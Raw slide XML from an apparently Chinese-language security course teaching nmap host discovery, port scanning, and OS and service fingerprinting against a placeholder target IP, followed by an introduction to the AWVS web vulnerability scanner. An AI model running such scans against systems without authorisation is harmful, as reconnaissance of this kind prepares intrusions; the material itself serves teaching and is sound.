              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表示目标主机在线</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{482BDFA1-9F0A-49F5-BA9F-8F4A0E717177}"/>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识别存活主机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21BB6A19-8A87-45B6-A51F-E3AB85A4FF7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="461740" y="2941100"/>
            <a:ext cx="6108700" cy="969645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCA6E11D-48C5-49B8-B840-ABEC75D10C0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380801" y="4621488"/>
            <a:ext cx="6096000" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>扫描子网内在线主机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD529FDC-4FF5-419A-A70D-FC16D313439E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6083300" y="2212975"/>
            <a:ext cx="6108700" cy="4645025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222394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659631" y="2008805"/>
            <a:ext cx="10434465" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>扫描目标主机打开的端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{482BDFA1-9F0A-49F5-BA9F-8F4A0E717177}"/>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扫描端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{723CE473-A4FF-4846-A365-7FEEBFB5A5DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="143339" y="3090658"/>
            <a:ext cx="6108700" cy="2122170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{223A3579-50B3-4D35-8243-549F89EC9B87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6108700" y="2038278"/>
            <a:ext cx="6096000" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>扫描指定端口（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1-1000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>号端口）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -p 1-1000 [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECABDAD0-84D6-4527-8D3E-61FBF1A46493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3081037"/>
            <a:ext cx="6108700" cy="2025650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35245569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659631" y="2008805"/>
            <a:ext cx="10434465" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>操作系统指纹识别一般用来帮助用户识别某台设备上运行的操作系统类型。通过分析设备往网络发送的数据包中某些协议标记、选项和数据，我们可以推断发送这些数据包的操作系统。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{482BDFA1-9F0A-49F5-BA9F-8F4A0E717177}"/>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系统指纹识别</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78C3D780-528F-4DD3-93FA-F17BA5407DBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6083300" y="3101491"/>
            <a:ext cx="6108700" cy="3463925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AAEB363-AD1F-4B7A-89E7-293F2AD0E48B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="3149096"/>
            <a:ext cx="5673419" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>能够探测到远程操作系统版本的网络侦察工具是非常有价值的，因为许多安全漏洞都依赖于操作系统的版本，如果没有这些信息，攻击者的攻击和利用都会受到限制。所以攻击发动之前要做的就是收集目标操作系统信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行系统指纹识别，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>参数用于识别操作系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -O [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28589185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659631" y="2008805"/>
            <a:ext cx="10434465" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行服务指纹识别</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56605945-A755-423C-967A-132E6F241D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4985396" y="2839802"/>
            <a:ext cx="6108700" cy="3002915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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系统指纹识别</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5109755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743607" y="2969858"/>
            <a:ext cx="10434465" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞扫描是指基于漏洞数据库，通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测，发现可利用漏洞的一种安全检测（渗透攻击）行为。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12267586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501011" y="1595021"/>
            <a:ext cx="11600793" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> Web Vulnerability Scanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AWVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）是一款知名的网络漏洞扫描工具，它通过网络爬虫测试你的网站安全，检测流行安全漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>自动的客户端脚本分析器，允许对 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Ajax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Web 2.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应用程序进行安全性测试。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>业内最先进且深入的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入和跨站脚本测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>高级渗透测试工具，例如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTTP Editor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Fuzzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可视化宏记录器帮助您轻松测试 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表格和受密码保护的区域</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>支持含有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CAPTHCA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的页面，单个开始指令和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Two Factor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（双因素）验证机制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>6.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>丰富的报告功能，包括 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>VISA PCI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>依从性报告</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>7.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>高速的多线程扫描器轻松检索成千上万个页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
